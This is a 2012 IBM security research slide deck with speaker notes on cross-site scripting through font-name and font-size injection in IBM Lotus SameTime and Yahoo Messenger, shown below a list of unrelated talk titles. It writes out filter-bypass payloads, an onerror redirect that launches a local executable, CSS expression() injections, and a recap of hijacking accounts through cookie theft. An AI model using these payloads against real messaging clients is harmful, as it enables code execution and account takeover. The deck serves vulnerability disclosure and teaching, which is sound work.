Y-Combinator seed pitch deck template PPY-Combinator seed pitch deck template PP
Y-Combinator seed pitch deck template PP
 
Mutation Testing for Task-Oriented Chatbots
Mutation Testing for Task-Oriented ChatbotsMutation Testing for Task-Oriented Chatbots
Mutation Testing for Task-Oriented Chatbots
 
GNSS spoofing via SDR (Criptored Talks 2024)
GNSS spoofing via SDR (Criptored Talks 2024)GNSS spoofing via SDR (Criptored Talks 2024)
GNSS spoofing via SDR (Criptored Talks 2024)
 
What is an RPA CoE? Session 1 – CoE Vision
What is an RPA CoE?  Session 1 – CoE VisionWhat is an RPA CoE?  Session 1 – CoE Vision
What is an RPA CoE? Session 1 – CoE Vision
 
Columbus Data & Analytics Wednesdays - June 2024
Columbus Data & Analytics Wednesdays - June 2024Columbus Data & Analytics Wednesdays - June 2024
Columbus Data & Analytics Wednesdays - June 2024
 
“How Axelera AI Uses Digital Compute-in-memory to Deliver Fast and Energy-eff...
“How Axelera AI Uses Digital Compute-in-memory to Deliver Fast and Energy-eff...“How Axelera AI Uses Digital Compute-in-memory to Deliver Fast and Energy-eff...
“How Axelera AI Uses Digital Compute-in-memory to Deliver Fast and Energy-eff...
 
HCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAUHCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAU
 
GraphRAG for LifeSciences Hands-On with the Clinical Knowledge Graph
GraphRAG for LifeSciences Hands-On with the Clinical Knowledge GraphGraphRAG for LifeSciences Hands-On with the Clinical Knowledge Graph
GraphRAG for LifeSciences Hands-On with the Clinical Knowledge Graph
 
Overcoming the PLG Trap: Lessons from Canva's Head of Sales & Head of EMEA Da...
Overcoming the PLG Trap: Lessons from Canva's Head of Sales & Head of EMEA Da...Overcoming the PLG Trap: Lessons from Canva's Head of Sales & Head of EMEA Da...
Overcoming the PLG Trap: Lessons from Canva's Head of Sales & Head of EMEA Da...
 
zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...
zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...
zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...
 

Stylish XSS

  • 1. © 2012 IBM Corporation IBM Security Systems 1© 2012 IBM Corporation Stylish XSS via Font Name Injection
  • 2. © 2012 IBM Corporation IBM Security Systems 2 Background - Instant Messengers
  • 3. © 2012 IBM Corporation IBM Security Systems 3 Background - Instant Messengers <Text Style=" font-family:Segoe UI; font-weight:bold; font-style:italic; color:#008000; ">Hi!</Text>
  • 4. © 2012 IBM Corporation IBM Security Systems 4 Background - Instant Messengers Every time I’ve seen this screen, I wondered “What if I could use some HTML here…”
  • 5. © 2012 IBM Corporation IBM Security Systems 5 Background - Windows Fonts Windows accepts basically any character as part of the font name Font name length limited to ~30 chars
  • 6. © 2012 IBM Corporation IBM Security Systems 6 IBM Lotus SameTime Messenger <span style="font-size:14pt;font-family:Segoe UI; font-weight:normal;font-style:normal;">You Do!</span>
  • 7. © 2012 IBM Corporation IBM Security Systems 7 SameTime - Exploit - CSS Font Name: expression(alert(1));
  • 8. © 2012 IBM Corporation IBM Security Systems 8 SameTime - Exploit - CSS Font Name: expression(alert(1)); Desired output: <span style= ";font-family:expression(alert(1));…"> Actual output: <span style="">
  • 9. © 2012 IBM Corporation IBM Security Systems 9 SameTime - Exploit - New Attribute Font Name: "onclick="alert(1)" Desired output: <span style="font-size:9pt;font-family:“ onclick="alert(1)" ..."> Actual output: <span style="font-size:9pt;font-family:" onclick="">
  • 10. © 2012 IBM Corporation IBM Security Systems 10 SameTime - Exploit ~50 Fonts Later
  • 11. © 2012 IBM Corporation IBM Security Systems 11 SameTime - Exploit - Found Message sent: <span style=“…font-family: Message Received: <span style=“…font-family:
  • 12. © 2012 IBM Corporation IBM Security Systems 12 SameTime - Exploit - Found Message sent: <span style=“…font-family:e0” <<style<style</style>img x='> Message Received: <span style=“…font-family:
  • 13. © 2012 IBM Corporation IBM Security Systems 13 SameTime - Exploit - Found Message sent: <span style=“…font-family:e0” <<style<style</style>img x='> Message Received: <span style=“…font-family:e0”> <img x='>
  • 14. © 2012 IBM Corporation IBM Security Systems 14 SameTime - Exploit - Found Message sent: <span style=“…font-family:e0” <<style<style</style>img x='>Rest of Orig CSS"> Message Received: <span style=“…font-family:e0”> <img x='>Rest of Orig CSS">
  • 15. © 2012 IBM Corporation IBM Security Systems 15 SameTime - Exploit - Found Message sent: <span style=“…font-family:e0” <<style<style</style>img x='>Rest of Orig CSS">' src='x' onerror='location="c:windowssystem32calc.exe" ' Message Received: <span style=“…font-family:e0”> <img x='>Rest of Orig CSS">
  • 16. © 2012 IBM Corporation IBM Security Systems 16 SameTime - Exploit - Found Message sent: <span style=“…font-family:e0” <<style<style</style>img x='>Rest of Orig CSS">' src='x' onerror='location="c:windowssystem32calc.exe" ' </span> Message Received: <span style=“…font-family:e0”> <img x='>Rest of Orig CSS">' src='x' onerror='location="c:windowssystem32calc.exe" ' </span>
  • 17. © 2012 IBM Corporation IBM Security Systems 17 SameTime – Remote Code Execution <span style="font-size:14pt;font-family:e0"> <img x=';font-weight:normal;font-style:normal;">' src='x' onerror='location="c:windowssystem32calc.exe"'</span>
  • 18. © 2012 IBM Corporation IBM Security Systems 18 Yahoo Messenger
  • 19. © 2012 IBM Corporation IBM Security Systems 19 Yahoo Messenger – Message View Lots of Colors, but that’s about it…
  • 20. © 2012 IBM Corporation IBM Security Systems 20 Yahoo Messenger - History View
  • 21. © 2012 IBM Corporation IBM Security Systems 21 Yahoo Messenger - History View
  • 22. © 2012 IBM Corporation IBM Security Systems 22 Yahoo Messenger - History View Finally, Yahoo's purple alert!
  • 23. © 2012 IBM Corporation IBM Security Systems 23 Yahoo Messenger - The Payload <img src="x"onmouseover="alert(1)">
  • 24. © 2012 IBM Corporation IBM Security Systems 24 Yahoo Messenger - Digging Deeper Wait, what? It's not local?!
  • 25. © 2012 IBM Corporation IBM Security Systems 25 Yahoo Messenger - Digging Deeper Accessing this URL in Chrome, yields the same result.
  • 26. © 2012 IBM Corporation IBM Security Systems 26 Yahoo Messenger - Digging Deeper That means I can read the cookie! And steal your account!
  • 27. © 2012 IBM Corporation IBM Security Systems 27 Yahoo Messenger - Recap 1. Send the victim a message that contain malicious HTML snippet 2. Wait 3-4 hours for it to show up in the history 3. Convince the user to access his history or send him a direct link to it (after all, it not local) 4. Have the victim click the Instant Message from the drop-down box
  • 28. © 2012 IBM Corporation IBM Security Systems 28 Yahoo Messenger - Introducing: Web Messenger! Finally I can see the results of my attacks in real time!
  • 29. © 2012 IBM Corporation IBM Security Systems 29 Yahoo Messenger - Web Messenger During the tests, I noticed that a <Font> tag sent as part of the message text, is being rendered differently in the Web Messenger. • The message: <font face="xxx" size="20">33333</font> • Was rendered as: <font style="font-size:20pt" face="xxx“ id="yui_3_2_0_20_1330267588862427">33333</font>
  • 30. © 2012 IBM Corporation IBM Security Systems 30 Yahoo Messenger - Exploiting CSS Add a new rule with an expression() call.
  • 31. © 2012 IBM Corporation IBM Security Systems 31 Yahoo Messenger - Exploiting CSS Started With: <font face=ssss size="1&color:red">xxxx</font> To my surprise the response came back as I hoped <font style="font-size:1&amp;color:red" >xxxx</font>
  • 32. © 2012 IBM Corporation IBM Security Systems 32 Yahoo Messenger - Exploiting CSS Next was the expression: <font face=sssss size="1&color:expression(alert(1))" >xxxx</font> And again, it seems like nothing is filtering this... <font style="font-size:1&amp;color:expression(alert(1))" >xxxx</font>
  • 33. © 2012 IBM Corporation IBM Security Systems 33 Yahoo Messenger - Exploiting CSS Time to open Internet Explorer!
  • 34. © 2012 IBM Corporation IBM Security Systems 34 Yahoo Web Messenger - IE Version
  • 35. © 2012 IBM Corporation IBM Security Systems 35 Yahoo Web Messenger - IE Version The Rules (for IE): 1. The Size attribute must be surrounded by double-quotes (" ") 2. The size value must be followed by the "pt;" suffix <font size="15pt;"> <font style="font-size=15pt;">
  • 36. © 2012 IBM Corporation IBM Security Systems 36 Yahoo Web Messenger - IE Version By tweaking the size value, a new Font-Family CSS rule could be injected. <font size="15pt;font-family:aaaa;"> <font style="font-size=15pt;font-family: aaaa;">
  • 37. © 2012 IBM Corporation IBM Security Systems 37 Yahoo Web Messenger - IE Version With all that in mind, and ~30 <Font> tags later, came the following payload that bypass the CSS filtering <font size="15pt;font-family:expression(alert(1));">
  • 38. © 2012 IBM Corporation IBM Security Systems 38 Yahoo Web Messenger - IE Version It should work correctly according to the rendered source in IE Developer Tools
  • 39. © 2012 IBM Corporation IBM Security Systems 39 Yahoo Web Messenger - IE Version Yet somehow, no alert
  • 40. © 2012 IBM Corporation IBM Security Systems 40 Yahoo Web Messenger - Uber Meta! After ~5 hours of more fiddling and long lonely IM chats with myself I finally found out what I was afraid of. Or in other words, The "No Expression For You" Meta Tag <meta http-equiv="X-UA-Compatible" content="IE=8"/>
  • 41. © 2012 IBM Corporation IBM Security Systems 41 Yahoo Web Messenger - Going Old School Fired up my Windows XP VM and kicked out IE8
  • 42. © 2012 IBM Corporation IBM Security Systems 42 Yahoo Web Messenger - Finally
  • 43. © 2012 IBM Corporation IBM Security Systems 43 Yahoo Messenger - History Window
  • 44. © 2012 IBM Corporation IBM Security Systems 44 Questions?

Editor's Notes

  1. Who am I? This presentation is going to show an idea I had and how I leveraged this idea into 3 vulnerabilities in the major IM clients One of which will not be disclosed today due to the fact that it was not yet patched. It will be publish in our blog once it is patched
  2. Explain how IMs work: Talk about: -------------- The message window is actually a browser The users text message is wrapped in HTML\XML template containing the following fields Message is sent to and then rendered as HTML\XML in the clients browser. Accept parameters dictating: color Font name Font weight Font style And more בואו נדבר על IMS ונשים רגע בצד את כל הפונקציונאליות של וידאו, סאונד שליחת קבצים וכו ונשאיר רק את האספקט של שליחת ההודעות. אם ננסה למפות את הדרכים שלנו לשלוח קלט למערכת, נגיע למשהו כמו בדוגמא
  3. Explain how IMs work: Talk about: -------------- The message window is actually a browser The users text message is wrapped in HTML\XML template containing the following fields Message is sent to and then rendered as HTML\XML in the clients browser. Accept parameters dictating: color Font name Font weight Font style And more בואו נדבר על IMS ונשים רגע בצד את כל הפונקציונאליות של וידאו, סאונד שליחת קבצים וכו ונשאיר רק את האספקט של שליחת ההודעות. אם ננסה למפות את הדרכים שלנו לשלוח קלט למערכת, נגיע למשהו כמו בדוגמא
  4. To configure all these setting, these apps usually come with a screen like this one Every time I’ve seen this screen, I wondered “what if I could use some HTML here…”
  5. And apparently, you can! Windows fonts, All Chars are valid Max 30 chars in every font name
  6. Explain that the font we change, goes into this template and then sent out. Talk about possibilities of exploits: 1. Expression 2. Get out to span tag 3. Get out to HTML main context
  7. Starting off with expression
  8. The server actually filtered everything in the CSS
  9. Moving to the next payload, Getting out of the style attr and getting into a new onclick attr Result in the onclick being empty. No good
  10. Two fields attack First field (Font Name): ----------- 1. Filter deletes the <style<style</style part 2. We are left with e0”><img x=‘….. Opens a new IMG tag with X attribute (using a single quot) Second field (Message Text): --------------- 1. Closes the X attribute (it contains all the rest of the real CSS) 2. Adds a SRC attribute 3. Adds an ONERROR attribute relocation the windows to an EXE/BAT file 4. File will be executed
  11. Two fields attack First field (Font Name): ----------- 1. Filter deletes the <style<style</style part 2. We are left with e0”><img x=‘….. Opens a new IMG tag with X attribute (using a single quot) Second field (Message Text): --------------- 1. Closes the X attribute (it contains all the rest of the real CSS) 2. Adds a SRC attribute 3. Adds an ONERROR attribute relocation the windows to an EXE/BAT file 4. File will be executed
  12. Two fields attack First field (Font Name): ----------- 1. Filter deletes the <style<style</style part 2. We are left with e0”><img x=‘….. Opens a new IMG tag with X attribute (using a single quot) Second field (Message Text): --------------- 1. Closes the X attribute (it contains all the rest of the real CSS) 2. Adds a SRC attribute 3. Adds an ONERROR attribute relocation the windows to an EXE/BAT file 4. File will be executed
  13. Two fields attack First field (Font Name): ----------- 1. Filter deletes the <style<style</style part 2. We are left with e0”><img x=‘….. Opens a new IMG tag with X attribute (using a single quot) Second field (Message Text): --------------- 1. Closes the X attribute (it contains all the rest of the real CSS) 2. Adds a SRC attribute 3. Adds an ONERROR attribute relocation the windows to an EXE/BAT file 4. File will be executed
  14. Two fields attack First field (Font Name): ----------- 1. Filter deletes the <style<style</style part 2. We are left with e0”><img x=‘….. Opens a new IMG tag with X attribute (using a single quot) Second field (Message Text): --------------- 1. Closes the X attribute (it contains all the rest of the real CSS) 2. Adds a SRC attribute 3. Adds an ONERROR attribute relocation the windows to an EXE/BAT file 4. File will be executed
  15. Two fields attack First field (Font Name): ----------- 1. Filter deletes the <style<style</style part 2. We are left with e0”><img x=‘….. Opens a new IMG tag with X attribute (using a single quot) Second field (Message Text): --------------- 1. Closes the X attribute (it contains all the rest of the real CSS) 2. Adds a SRC attribute 3. Adds an ONERROR attribute relocation the windows to an EXE/BAT file 4. File will be executed
  16. Second line shows the trapped CSS in the X parameter Calc executed example
  17. Yahoo No History found in local FS, meaning template is unknown Messages sent takes about 3-4 hours till they register in the History That means that every time I wanted to test anything, I have to wait 3-4 for the results and only then tweak my payloads and resend everything…
  18. Message view seems to sanitize input well, All messages sent managed to do nothing more the pretty colors Taking into account the fact that every test take 3 hours, I decided its best to move on and open the history
  19. Looks a bit better but still, nothing interesting…
  20. The next step I took was to change the history filter to “Instant Messages”
  21. Boom Endless pop ups poped up… Apparently a lot of my tests worked…
  22. I isolated the simplest payload that worked and we can now move on and get some info such as: User Agent Privileges Etc…
  23. Digging deeper got us the browser type (IE) And the location of the page, which is an internet address
  24. So I tried accessing this page using chrome, and as long as I was Logged in to Yahoo! It got me to the same results!
  25. The next thing I found was the cookie Apparently, Yahoo don’t like to use HTTP-only cookies, so once stealing the cookie actually means stealing the account!
  26. Send message Wait 3-4h Social engineer the user into opening the History Have the user click on the Instant Messages context menu
  27. No more 3 hours tests I can now send a message and see it on the web messenger immediately I now know the template.
  28. I sent the first line of code The web messenger rendered the second line of code Changes: Added a new ID attribute – We don’t care! Transformed the Size attribute into a CSS Font-Size attribute – Very Interesting!
  29. First, I tried to inject a new color:red sentence Using the & -> &amp; encoding in order to terminate the css rule and inject a new one And that worked without a glitch
  30. Tried the same with an expression call, and all seems well
  31. Opening IE But no alert… After digging a little deeper
  32. Different sanitizer per browser Found an older message that has a similar behavior Worked in that example till I found some guidelines for the transformation on IE
  33. Talk about the two rules of transformation
  34. Using these guidelines I attempted a new rule injection
  35. Payload found – new rule injected Explain the CSS encoding trick
  36. Everything looks good in IE
  37. Somehow, no alert
  38. Goddamn meta tag But this meta tag doesn’t work in IE<8
  39. VM Kick off IE8
  40. Entered the same URL with IE 7 and the alert shows up
  41. Also in the original History view of the messenger which actually uses the installed IE